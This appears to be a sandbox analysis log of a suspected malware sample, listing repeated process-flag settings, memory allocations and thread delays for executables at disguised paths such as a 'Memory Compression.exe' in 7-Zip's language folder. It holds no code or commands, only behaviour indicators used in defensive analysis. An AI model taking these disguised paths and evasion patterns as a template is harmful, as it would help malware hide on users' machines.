Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\surrogateserverreviewsession\dasHost.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\surrogateserverreviewsession\Agentserver.exe	Memory allocated: D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Memory allocated: 1A790000 memory reserve \| memory write watch	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Memory allocated: 1100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Memory allocated: 1AC10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Memory allocated: 1120000 memory reserve \| memory write watch
Source: C:\surrogateserverreviewsession\dasHost.exe	Memory allocated: 1AEC0000 memory reserve \| memory write watch
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Memory allocated: 11B0000 memory reserve \| memory write watch
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Memory allocated: 1ACD0000 memory reserve \| memory write watch
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Memory allocated: BC0000 memory reserve \| memory write watch
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Memory allocated: 1A630000 memory reserve \| memory write watch
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Memory allocated: 14E0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Memory allocated: 1AFE0000 memory reserve \| memory write watch
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Memory allocated: 1790000 memory reserve \| memory write watch
Source: C:\Program Files\Windows NT\uXGucUKOPdf.exe	Memory allocated: 1B250000 memory reserve \| memory write watch
Source: C:\surrogateserverreviewsession\dasHost.exe	Memory allocated: 2550000 memory reserve \| memory write watch
Source: C:\surrogateserverreviewsession\dasHost.exe	Memory allocated: 1A7F0000 memory reserve \| memory write watch

Source: C:\surrogateserverreviewsession\Agentserver.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 600000
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599875
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599764
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599648
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599547
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599437
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599325
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599218
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599109
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 599000
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598890
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598781
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598669
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598562
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598453
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598343
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598234
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598125
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 598015
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597906
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597797
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597687
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597577
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597464
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Thread delayed: delay time: 597358
